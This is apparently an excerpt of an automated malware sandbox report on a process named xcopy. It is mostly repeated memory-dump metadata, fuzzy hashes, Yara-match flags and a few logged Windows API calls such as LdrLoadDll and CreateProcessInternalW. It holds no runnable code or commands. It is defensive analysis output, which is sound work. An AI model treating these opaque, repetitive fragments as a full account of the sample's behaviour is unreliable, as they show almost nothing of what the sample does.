                                                                                              • Instruction ID: f0eaceb9904f4328ebefea665e5dfedb1ab19eaa079f13fd51891f6662e86a15
                                                                                              • Opcode Fuzzy Hash: 91803be361a284a823c49015fceed77d831825acfd90d5391f0265d04e5a99dd
                                                                                              • Instruction Fuzzy Hash: 4A90027120240C02E180B158840464A004587D1301F95C425A0025654DCB568B6977A1
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 7ad7cfb88e2a1596621b2ba1ad0be7a9ef0fc44b42a02ab3a5b7968a2f4166d1
                                                                                              • Instruction ID: 9ea57f871ee0c3b49973dacde9b6278c883330dc9281d46240bb3b435e832dab
                                                                                              • Opcode Fuzzy Hash: 7ad7cfb88e2a1596621b2ba1ad0be7a9ef0fc44b42a02ab3a5b7968a2f4166d1
                                                                                              • Instruction Fuzzy Hash: A5900475313404031105F55C470450700C7C7D5351355C431F1015550CD773CF715331
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 4aa9d4424ff9e833de0c9d71053aaf9749a7a67966d0eda5c49b5622bab224ff
                                                                                              • Instruction ID: 36a16a8756a87d822bbccf24d003326af39dc2ec394350a3340b27672618c2f3
                                                                                              • Opcode Fuzzy Hash: 4aa9d4424ff9e833de0c9d71053aaf9749a7a67966d0eda5c49b5622bab224ff
                                                                                              • Instruction Fuzzy Hash: F7900265222404021145F558460450B048597D6351395C425F1416590CC7628A755321
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 835ecbae7a7605b523aa3bf9abd6c0aee3683f16c6ad8ec4f685a8671b50d0cc
                                                                                              • Instruction ID: 2a161f0689fcce10fd5acc57274db915b7329b37ffcc50cd770f7b48e856df52
                                                                                              • Opcode Fuzzy Hash: 835ecbae7a7605b523aa3bf9abd6c0aee3683f16c6ad8ec4f685a8671b50d0cc
                                                                                              • Instruction Fuzzy Hash: AA9002A134240842E100B1588414B060045C7E1301F55C425E1064554D875ACE626226
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 110cbcae15b0e3f0a48e5fbdc1edb98a00a96dceade2330d658dcfbae84bbd26
                                                                                              • Instruction ID: 243cde401026bc521ac985d341bbf63a0b82b74a1743ee3363b70deff9f5b539
                                                                                              • Opcode Fuzzy Hash: 110cbcae15b0e3f0a48e5fbdc1edb98a00a96dceade2330d658dcfbae84bbd26
                                                                                              • Instruction Fuzzy Hash: FE900261602404425140B168C8449064045ABE1211755C531A0998550D869A8A755765
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 756422f94c1ba57923263611b6931929be3de58671024ac8206e36b7b25010ad
                                                                                              • Instruction ID: a63e1f6e6f7bf3037d4ccf7edcf15f916a179ab377bcd03228aa952e35a6dcf0
                                                                                              • Opcode Fuzzy Hash: 756422f94c1ba57923263611b6931929be3de58671024ac8206e36b7b25010ad
                                                                                              • Instruction Fuzzy Hash: 19900261212C0442E200B5688C14B07004587D0303F55C525A0154554CCA568A715621
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: c4c39a81215a303b91e96c8e7774f725b2934301602366cd66a2cfa31c8f6fd7
                                                                                              • Instruction ID: f6a9be2d9ece9b5418e2a51f7896d97d77551ddcc26c36433945a37a22ac4c58
                                                                                              • Opcode Fuzzy Hash: c4c39a81215a303b91e96c8e7774f725b2934301602366cd66a2cfa31c8f6fd7
                                                                                              • Instruction Fuzzy Hash: 8790026160240902E101B1588404616004A87D0241F95C432A1024555ECB668BA2A231
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: dc954e6f3a467fa2e3721864f33b72020799b159139afdc029b56e094cbbb825
                                                                                              • Instruction ID: 2df324633beec0a2fa315720990386f7677d689a21ff441fb7cca02d4eb48cee
                                                                                              • Opcode Fuzzy Hash: dc954e6f3a467fa2e3721864f33b72020799b159139afdc029b56e094cbbb825
                                                                                              • Instruction Fuzzy Hash: 239002A120280803E140B5588804607004587D0302F55C421A2064555E8B6A8E616235
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: eed0a77366db4842cc05f64f916228eb876fdb82724b1cb746e67c746307e3de
                                                                                              • Instruction ID: 6a4f5a84d6043e0b192641df798972165c76c222ec079c4de7bf2bfbe0d4f662
                                                                                              • Opcode Fuzzy Hash: eed0a77366db4842cc05f64f916228eb876fdb82724b1cb746e67c746307e3de
                                                                                              • Instruction Fuzzy Hash: 9090026921340402E180B158940860A004587D1202F95D825A0015558CCA568A795321
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 6169e51ff44dd9b539b74b1ad9bbe3e3d0b3fefb87361e1a8f877ac42bf08d94
                                                                                              • Instruction ID: 07493e844f380bd46869fc7c1e9de46855435547739c4be9503aa1f7304814ca
                                                                                              • Opcode Fuzzy Hash: 6169e51ff44dd9b539b74b1ad9bbe3e3d0b3fefb87361e1a8f877ac42bf08d94
                                                                                              • Instruction Fuzzy Hash: 4A90026130240403E140B15894186064045D7E1301F55D421E0414554CDA568A665322
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: fd04547b52b89958ce9390fd965e24c1664948918228397873c5da98c097fe40
                                                                                              • Instruction ID: bbc2180d0c64bc8222e0ed8bf23b0f3e7ba72b30417c4310202d2e54dcfb314f
                                                                                              • Opcode Fuzzy Hash: fd04547b52b89958ce9390fd965e24c1664948918228397873c5da98c097fe40
                                                                                              • Instruction Fuzzy Hash: 18900261243445526545F1588404507404697E0241795C422A1414950C86679A66D721
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 4ddc560d9d099dcfe8397ee2f7522431a9f78aad16ca07d1e22dce2a8ae74705
                                                                                              • Instruction ID: 43f0da7c43171a7e671a1a048ab786d651238143d371c55ab27cb38ecb76ffc0
                                                                                              • Opcode Fuzzy Hash: 4ddc560d9d099dcfe8397ee2f7522431a9f78aad16ca07d1e22dce2a8ae74705
                                                                                              • Instruction Fuzzy Hash: 2A90027120240813E111B1588504707004987D0241F95C822A0424558D97978B62A221
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2800000_xcopy.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: InitializeUninitialize
                                                                                              • String ID: @J7<
                                                                                              • API String ID: 3442037557-2016760708
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2800000_xcopy.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: InitializeUninitialize
                                                                                              • String ID: @J7<
                                                                                              • API String ID: 3442037557-2016760708
                                                                                              APIs
                                                                                              • Sleep.KERNELBASE(000007D0), ref: 028239DB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2800000_xcopy.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID: wininet.dll
                                                                                              • API String ID: 3472027048-3354682871
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(E7AA48BB), ref: 028181DC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2800000_xcopy.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              APIs
                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02814432
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2800000_xcopy.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Load
                                                                                              • String ID:
                                                                                              • API String ID: 2234796835-0
                                                                                              APIs
                                                                                              • CreateProcessInternalW.KERNELBASE(?,?,?,?,0281816E,00000010,?,?,?,00000044,?,00000010,0281816E,?,?,?), ref: 02829670
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2800000_xcopy.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateInternalProcess
                                                                                              • String ID:
                                                                                              • API String ID: 2186235152-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.3912829245.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.3912829245.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000006.00000002.3912829245.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_2fc0000_xcopy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0